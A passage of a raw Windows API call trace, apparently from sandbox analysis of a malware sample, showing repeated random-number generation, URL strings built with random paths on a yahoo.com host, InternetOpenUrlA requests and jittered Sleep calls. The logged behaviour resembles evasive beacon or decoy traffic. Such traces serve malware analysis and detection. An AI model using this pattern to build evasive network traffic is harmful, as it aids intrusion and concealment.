lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0181.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.989] GetProcessHeap () returned 0x440000 [0181.989] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0181.989] lstrcpyA (in: lpString1=0x473140, lpString2="\x847Û\x19s://www.yahoo.com" | out: lpString1="\x847Û\x19s://www.yahoo.com") returned="\x847Û\x19s://www.yahoo.com" [0181.989] lstrcatA (in: lpString1="\x847Û\x19s://www.yahoo.com", lpString2="/GuxFcm4P0UQ2tbzZcohhMv7O/" | out: lpString1="\x847Û\x19s://www.yahoo.com/GuxFcm4P0UQ2tbzZcohhMv7O/") returned="\x847Û\x19s://www.yahoo.com/GuxFcm4P0UQ2tbzZcohhMv7O/" [0181.989] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0181.989] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x847Û\x19s://www.yahoo.com/GuxFcm4P0UQ2tbzZcohhMv7O/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0181.989] GetProcessHeap () returned 0x440000 [0181.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0181.989] GetProcessHeap () returned 0x440000 [0181.989] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0181.989] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0181.989] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0181.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0181.990] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0181.990] Sleep (dwMilliseconds=0x1979f) [0182.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0182.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.206] GetProcessHeap () returned 0x440000 [0182.206] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b3a0 [0182.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3a1, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1b3a1) returned 0x0 [0182.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0182.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b3d0, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a1b3d0) returned 0x0 [0182.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.218] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0182.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.225] GetProcessHeap () returned 0x440000 [0182.225] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0182.225] lstrcpyA (in: lpString1=0x473350, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0182.225] lstrcatA (in: lpString1="\x04", lpString2="/X9jtp9wz8w070g5ivkwl3gtZQYlwonli7bymKBw9ji1Hko/hY2piBSt6nUo1byq8ndupaeehaegmcYJ4rotbKxoe3C/" | out: lpString1="\x04/X9jtp9wz8w070g5ivkwl3gtZQYlwonli7bymKBw9ji1Hko/hY2piBSt6nUo1byq8ndupaeehaegmcYJ4rotbKxoe3C/") returned="\x04/X9jtp9wz8w070g5ivkwl3gtZQYlwonli7bymKBw9ji1Hko/hY2piBSt6nUo1byq8ndupaeehaegmcYJ4rotbKxoe3C/" [0182.225] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0182.225] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/X9jtp9wz8w070g5ivkwl3gtZQYlwonli7bymKBw9ji1Hko/hY2piBSt6nUo1byq8ndupaeehaegmcYJ4rotbKxoe3C/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0182.225] GetProcessHeap () returned 0x440000 [0182.225] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0182.225] GetProcessHeap () returned 0x440000 [0182.225] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b3a0 | out: hHeap=0x440000) returned 1 [0182.225] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0182.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0182.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0182.226] GetProcAddress (hModule=0x7ffc5ecd0000, 